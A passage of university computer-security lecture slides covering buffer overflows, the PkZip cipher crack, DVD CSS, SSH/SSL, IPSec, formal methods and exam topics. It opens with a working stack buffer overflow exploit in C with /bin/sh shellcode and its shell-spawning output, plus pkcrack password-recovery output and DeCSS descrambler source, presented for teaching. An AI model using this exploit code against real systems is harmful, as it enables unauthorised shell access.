#include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define NOP 0x90 char shellcode[] = " \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" " \x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" " \x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp ( void) __asm__ (" movl %esp,%eax"); void main ( int argc, char *argv[]) char *buff, *ptr; long *addr_ptr, addr; int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE; int i; if (argc > 1) bsize = atoi (argv[1]); if (argc > 2) offset = atoi (argv[2]); if (!(buff = malloc (bsize))) printf (" Can’t allocate memory.\n"); exit (0); addr = get_sp () − offset; printf (" Using address: 0x%x\n", addr); ptr = buff; addr_ptr = ( long *) ptr; for (i = 0; i < bsize; i += 4) *(addr_ptr++) = addr; for (i = 0; i < bsize / 2; i++) buff[i] = NOP; ptr = buff + ((bsize / 2) − (strlen (shellcode) / 2)); for (i = 0; i < strlen (shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize − 1] = ’ \0’; memcpy (buff, " EGG=", 4); putenv (buff); system (" /bin/bash");
CODE LISTING exploit3.cCODE LISTING exploit3.c
CS3235 - Hugh Anderson’s notes. Page number: 485
Exploit
[hugh@pnp176-44 programs]$ ./exploit3 560Using address: 0xbfffe998[hugh@pnp176-44 programs]$ ./vulnerable $EGGArgument is ????????...???????sh-2.05b$
We are now within the vulnerable program process, but run-ning the sh shell program, instead of the vulnerable pro-gram.
CS3235 - Hugh Anderson’s notes. Page number: 486
Using the buffer overflow attack
A server (say a web server) that expects a query, andreturns a response.
A CGI/ASP or perl script inside a web server
A SUID root program on a UNIX system
CS3235 - Hugh Anderson’s notes. Page number: 487
Example attack - Blaster
Recently we have been having a series of attacks on Mi-crosoft systems that are based on various buffer overflowproblems.
The Blaster worm is described in the CERT advisory“CA-2003-20 W32/Blaster worm”:
The W32/Blaster worm exploits a vulnerability inMicrosoft’s DCOM RPC interface as described inVU#568148 and CA-2003-16. Upon successful exe-cution....
CS3235 - Hugh Anderson’s notes. Page number: 488
Example attack CRC-32 on ssh
http://razor.bindview.com/publish/advisories/adv ssh1crc.html
CS3235 - Hugh Anderson’s notes. Page number: 489
This session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
CS3235 - Hugh Anderson’s notes. Page number: 490
PkZip stream cipher
PkZip is for compressing files
PkZip can also scramble files when given a secret pass-word.
Enciphering strategy is weak and can be cracked
http://citeseer.nj.nec.com/122586.html
Weakness in the (homegrown) ciphering algorithm
CS3235 - Hugh Anderson’s notes. Page number: 491
PkZip stream cipher
opo 144% pkcrack -C all.zip -c readme.doc -P plain.zip -p readme.docFiles read. Starting stage 1 on Wed Sep 8 09:04:02 1999Generating 1st generation of possible key2 421 values...done.Found 4194304 possible key2-values.Now we’re trying to reduce these...Done. Left with 18637 possible Values. bestOffset is 24.Stage 1 completed. Starting stage 2 on Thu Sep 9 09:12:06 1999Ta-daaaaa! key0=dda9e469, key1=96212999, key2=f9fc9651Probabilistic test succeeded for 402 bytes.Stage2 completed. Starting pass-word search on Thu Sep 9 09:22:22 1999Key: 73 65 63 72 65 74Or as a string: ’secret’ (without the enclosing single quotes)Finished on Thu Sep 9 10:54:22 1999 opo 99%opo 145% ./zipdecrypt dda9e469 96212999 f9fc9651 all.zip rr.zipopo 146%
rr.zip contains unencypted version of archive
CS3235 - Hugh Anderson’s notes. Page number: 492
PkZip stream cipher fix
The PkZip stream cipher is also susceptible to dictionaryattacks, and so it is considered not suitable for secure en-cryption of data. The fix is:
Don’t use PkZip for security purposes.
CS3235 - Hugh Anderson’s notes. Page number: 493
This session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
CS3235 - Hugh Anderson’s notes. Page number: 494
DVD security
Content Scrambling System - data encryption scheme
Developed by commercial interests to stop copying... but
Easy to copy a DVD, but CSS prevents decrypting,changing and re-recording.
Details are trade secret.
Master set of 400 keys is stored on every DVD, and theDVD player uses these to generate a key needed to de-crypt data from the disc.
CS3235 - Hugh Anderson’s notes. Page number: 495
DVD security
Linux users were excluded from access to CSS licensesbecause of the open-source nature of Linux.
In October 1999, hobbyists/hackers in Europe crackedthe CSS algorithm
DVD industry players have been trying to prevent distri-bution of any software
The source code for decoding DVD is available on a T-shirt.
CS3235 - Hugh Anderson’s notes. Page number: 496
DVD security
The lesson to learn from this is that once-againsecurity-through-obscurity is a very poor strategy.
The source code and detailed descriptions for a CSS de-scrambler is available at:
http://www-2.cs.cmu.edu/˜dst/DeCSS/Gallery/
CS3235 - Hugh Anderson’s notes. Page number: 497
DVD security
Description of the key/descrambling process:
First one must have a master key, which is unique tothe DVD player manufacturer. It is also known as aplayer key. The player reads an encrypted disk keyfrom the DVD, and uses its player key to decrypt thedisk key. Then the player reads the encrypted title keyfor the file to be played. (The DVD will likely containmultiple files, typically 4 to 8, each with its own titlekey.) It uses the decrypted disk key (DK) to decryptthe title key. Finally, the decrypted title key, TK, is usedto descramble the actual content.
CS3235 - Hugh Anderson’s notes. Page number: 498
DVD security
Confusion and diffusion...
#define m(i)(x[i]^s[i+84])< <unsigned char x[5],y,s[2048];main(n)for(read(0,x,5);read(0,s,n=2048);write(1,s ,n))if(s[y=s[13]%8+20]/16%4==1)int i=m(1)17^256+m(0)8,k=m(2)0,j=m(4)17^m(3)9^k *2-k%8^8,a=0,c=26;for(s[y]-=16;--c;j*=2)a=a*2^i&1,i=i/2^j&1< <24;for(j=127;++j<n ;c=c>y)c+=y=i^i/8^i> >4^i> >12,i=i> >8^y< <17,a^=a> >14,y=a^a*8^a< <6,a=a> >8^y< <9,k=s [j],k="7Wo~’G \216"[k&7]+2^"cr3sfw6v;*k+>/n."[k> >4]*2^k*257/8,s[j]=k^(k&k*2&34) *6^c+~y;
CS3235 - Hugh Anderson’s notes. Page number: 499
This session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
CS3235 - Hugh Anderson’s notes. Page number: 500
ssh
For logging in a remote machine
Has secure encrypted communications, and...
You can’t snoop or sniff passwords.
TCP/IP connections can be forwarded over the securechannel.
CS3235 - Hugh Anderson’s notes. Page number: 501
ssh - proving identity
1. /etc/hosts.equiv: same user name? OK - log in!I
2. ~/.rhosts: by user? OK - log in!
3. RSA: authentication using public-key cryptography.
4. TIS: trusted server to authenticate the user.
5. Passwords: password sent encrypted...
CS3235 - Hugh Anderson’s notes. Page number: 502
RSA key management
The file ~/.ssh/authorized keys lists the public keys for log-ging in.
• Initially: ssh program tells the server which key pair itwould like to use
• Challenge: server sends challenge encrypted with pub-lic key.
• Decrypt: client decrypts using private key. The chal-lenge returned as proof
CS3235 - Hugh Anderson’s notes. Page number: 503
Port forwarding
Secure shell supports TCP/IP port forwarding
For example - if we wanted to use a secure channel toour X display on the local machine, the proxy listens forconnections on a port, forwards the connection requestand any data over the secure channel, and makes a con-nection to the real X display from the SSH Terminal.
CS3235 - Hugh Anderson’s notes. Page number: 504
Secure Sockets Layer (SSL)
Netscape has protocol for data security - uses 128-bitkeys.
data encryption, server authentication, message integrity, and optional client authentication
SSL is an open, nonproprietary protocol
CS3235 - Hugh Anderson’s notes. Page number: 505
UN-SSL
Netscape weakly seeds a random number generator
Someone who can snoop the network and has access toan account can discover seed
Expected search space similar to brute-forcing a 40-bitkey
CS3235 - Hugh Anderson’s notes. Page number: 506
This session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
CS3235 - Hugh Anderson’s notes. Page number: 507
PGPfone
CS3235 - Hugh Anderson’s notes. Page number: 508
PGPfone
Speech compression and strong cryptography
Available in two versions:
1. An international version available outside America,and a prohibited import into America.
2. An American version available inside America, and aprohibited import out of America.
These two versions are also exactly the same! Restrictionson the import and export of munitions - strong cryptographyis considered a munition.
CS3235 - Hugh Anderson’s notes. Page number: 509
PGPfone
Familiar encryption and key exchange parameters:
When initially setting up a link, Diffie-Hellman key exchangeis used to ensure safety in the choice of an encryption key.
CS3235 - Hugh Anderson’s notes. Page number: 510
Chapter 11
Lecture 11 - Security
CS3235 - Hugh Anderson’s notes. Page number: 511
Last session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
CS3235 - Hugh Anderson’s notes. Page number: 512
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
CS3235 - Hugh Anderson’s notes. Page number: 513
Design principles
Paper by Saltzer and Schroeder, summarized below:
• Economy of mechanism: Keep the design as simpleand small as possible. (identd assumption)
• Fail-safe defaults: Base access decisions on permis-sion rather than exclusion. This is conservative design.(mail server - mail only access)
• Complete mediation: Every access to every objectmust be checked for authority. (DNS cache poisoning)
CS3235 - Hugh Anderson’s notes. Page number: 514
Design principles
• Open design: The design should not be secret. (DVDs,Microsoft SAM hashes...)
• Separation of privilege: Two keys are better than one.No single event can compromise the system. (su - pass-word and wheel group)
• Least privilege: Every program and every user of thesystem should operate using the least set of privilegesnecessary to complete the job. (Military need-to-know)
CS3235 - Hugh Anderson’s notes. Page number: 515
Design principles
• Least common mechanism: Minimize the amount ofmechanism common to more than one user and de-pended on by all users. (supervisor or library).
• Psychological acceptability: Human interface easy touse.
In the textbook there are examples of the use of each ofthese design principles.
CS3235 - Hugh Anderson’s notes. Page number: 516
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
CS3235 - Hugh Anderson’s notes. Page number: 517
Biometrics
Biometrics is the use of human physical characteristics tosupport authentication .
CS3235 - Hugh Anderson’s notes. Page number: 518
Biometrics - eyes
CS3235 - Hugh Anderson’s notes. Page number: 519
Minimal hardware biometrics
Voices - Record and process voice leading to eitherspeaker verification or recognition.
Faces - Capture either a static or moving image of a face.
Keystrokes - capture a sequence of keystrokes, record-ing timing.
Combinations of characteristics may be used, but in generalbiometric techniques are not reliable on their own. Goodsecond key for separation of privilege .
CS3235 - Hugh Anderson’s notes. Page number: 520
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
CS3235 - Hugh Anderson’s notes. Page number: 521
IPSec
IPSec is a set of standards intended to support com-munication security between networked computers, par-ticularly in the newer IPv6 (IP Next-Generation) network.
IPSec software is available in Windows2000, Linux, andon routers on the Internet.
http://www.faqs.org/rfcs/rfc2401.html
IPSec may be used in a range of ways.
CS3235 - Hugh Anderson’s notes. Page number: 522
IPSec VPN
ISP
CS3235 - Hugh Anderson’s notes. Page number: 523
IPSec point-to-point
CS3235 - Hugh Anderson’s notes. Page number: 524
IPSec network-to-network
CS3235 - Hugh Anderson’s notes. Page number: 525
IPSec headers
There are two types of header, one used for authentica-tion , and the other used for encryption :
1. AH - the Authentication Header for data integrity, anti-replay and authentication
2. ESP - the Encapsulating Security Payload header, forconfidentiality. ESP can also provide AH services.
Communicating parties agree on a Security Association(SA), one SA for each direction, and one SA for each typeof communication.
CS3235 - Hugh Anderson’s notes. Page number: 526
Modes of operation
• An end-to-end SA - Transport mode
IPv6 hdr
OriginalIPv6 hdr
AHOriginal
ESP
Transport segment
Transport segment ESP
authenticated
encrypted
authenticated
CS3235 - Hugh Anderson’s notes. Page number: 527
Modes of operation
• An SA between security gateways - Tunnel mode
IPv6 hdr
IPv6 hdr
AH
ESP
authenticated
encrypted
authenticated
New
New
IPv6 hdrOriginal
OriginalIPv6 hdr
Transport segment
Transport segment ESP
SAs form a kind of distributed database.
CS3235 - Hugh Anderson’s notes. Page number: 528
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
CS3235 - Hugh Anderson’s notes. Page number: 529
Formal methods
FM encompasses a wide range of techniques...
Model checking:
constructing formal models , with appropriate formal specifications .
Example is Promela and Spin .
CS3235 - Hugh Anderson’s notes. Page number: 530
Promela and spin
The language Promela is ’C’ like, with an initializationprocedure. It can model asynchronous or synchronous,deterministic or non-deterministic systems
Spin is the checker for Promela models
Assertions to test correctness of model:
assert(some boolean condition);
If condition not TRUE then assertion violated.
CS3235 - Hugh Anderson’s notes. Page number: 531
Temporal claims
We got here again without making any progress!
The support for temporal claims takes the form of:
Endstate labels - for determining valid endstates Progress labels - claim no non-progress cycles Never claims - impossible temporal assertions
CS3235 - Hugh Anderson’s notes. Page number: 532
Simple example
Bin
BA
Bout
BtoA
AtoB
Ain Aout
CS3235 - Hugh Anderson’s notes. Page number: 533
Promela example
init
chan AtoB = [1] of mtype,byte ;chan BtoA = [1] of mtype,byte ;chan Ain = [2] of mtype,byte ;chan Bin = [2] of mtype,byte ;chan Aout = [2] of mtype,byte ;chan Bout = [2] of mtype,byte ;atomic
run application( Ain,Aout );run transfer( Aout,Ain,BtoA,AtoB );run transfer( Bout,Bin,AtoB,BtoA );run application( Bin,Bout )
;AtoB!err(0)
CS3235 - Hugh Anderson’s notes. Page number: 534
Promela example
#define MAX 10mtype = ack, nak, err, next, accept proctype transfer( chan in, out, chin, chout )
byte o,i;in?next(o);do
:: chin?nak(i) -> out!accept(i); chout!ack(o):: chin?ack(i) -> out!accept(i); in?next(o); chout!ack(o):: chin?err(i) -> chout!nak(o)
od
CS3235 - Hugh Anderson’s notes. Page number: 535
Promela example
proctype application( chan in, out )
int i=0, j=0, last i=0;do
:: in?accept(i) ->assert( i==last i );if
:: (last i!=MAX) -> last i = last i+1:: (last i==MAX)
fi:: out!next(j) ->
if:: (j!=MAX) -> j=j+1:: (j==MAX)
fiod
CS3235 - Hugh Anderson’s notes. Page number: 536
Spin simulation
CS3235 - Hugh Anderson’s notes. Page number: 537
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
CS3235 - Hugh Anderson’s notes. Page number: 538
Formal evaluation - TCSEC
TCSEC (The Orange book) was the first rating system forthe security of products. It defined six different evaluationclasses. The classes are:
• C1 - For same-level security access. Not currently used.
• C2 - Controlled access protection - users are individ-ually accountable for their actions. Most OS manufactur-ers have C2 versions of the OS.
• B1 - Mandatory BLP policies - for more secure systemshandling classified data.
CS3235 - Hugh Anderson’s notes. Page number: 539
Formal evaluation - TCSEC
• B2 - structured protection - mandatory access controlfor all objects in the system. Formal models.
• B3 - security domains - more controls, minimal com-plexity, provable consistency of model.
• A1 - Verified design - consistency proofs betweenmodel and specification.
CS3235 - Hugh Anderson’s notes. Page number: 540
Formal evaluation - ITSEC
From Dutch, English, French and German national se-curity evaluation criteria .
Adaptable .
Sponsor determines operational requirements, threatsand security objectives.
ITSEC specifies the interactions and documents be-tween the sponsor and the evaluator.
CS3235 - Hugh Anderson’s notes. Page number: 541
ITSEC
Again there are various levels of evaluation: E0..E6, withE6 giving the highest level of assurance - it requires twoindependant formal verifications.
First certification of a smart-card system under E6.
The smart-cards are electronic purses - that is theycarry value,
Forgery must be impossible. The certification encompassed the communication
with the card, as well as the software within the card,and at the bank.
CS3235 - Hugh Anderson’s notes. Page number: 542
Data Diode E6, BLP
Data Diode
High Security
Low security
CS3235 - Hugh Anderson’s notes. Page number: 543
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
CS3235 - Hugh Anderson’s notes. Page number: 544
Exam
You can expect 12 pages - write on paper. Marks/50.
10 short answer questions worth 1 mark each
Longer questions on...
Encryption Information Models Key systems
CS3235 - Hugh Anderson’s notes. Page number: 545
Exam
Modulo, primes, Fermat, Euler: general & specific
Symmetric cryptosystems: IC, DES, general & specific
Physical limits: general
Information theory: general & security-specific
Models: BLP, Biba - general & specific
Key systems: RSA, Kerberos, specific
CS3235 - Hugh Anderson’s notes. Page number: 546
Dr Robert Deng
Real World Applications of Network/Computer Security
Abstract: The lecture is on practical applications of net-work and computer security technology. Examples in-clude virtual private networks, security solutions for e-banking, fair exchange of digital valuables over the Inter-net (e.g., electronic contract signing over a network andcertified e-mail delivery) and techniques for user privacyprotection in cyberspace.
CS3235 - Hugh Anderson’s notes. Page number: 547
Finally
This is my last lecture, so...
Good luck with the exam, and
Thanks for your attention
Good luck!
CS3235 - Hugh Anderson’s notes. Page number: 548
Contents
1 Lecture 1 - Introduction
2 Lecture 2 - Preliminaries
3 Lecture 3 - Preliminaries
4 Lecture 4 - Preliminaries
CS3235 - Hugh Anderson’s notes. Page number: 549
5 Lecture 5 - Preliminaries
6 Lecture 6 - Errors
7 Lecture 7 - Encryption
8 Lecture 8 - Protocols
9 Lecture 9 - System (in)security
10 Lecture 10 - More (in)security
CS3235 - Hugh Anderson’s notes. Page number: 550
11 Lecture 11 - Security
CS3235 - Hugh Anderson’s notes. Page number: 551
CS3235 - Hugh Anderson’s notes. Page number: 552
Top Related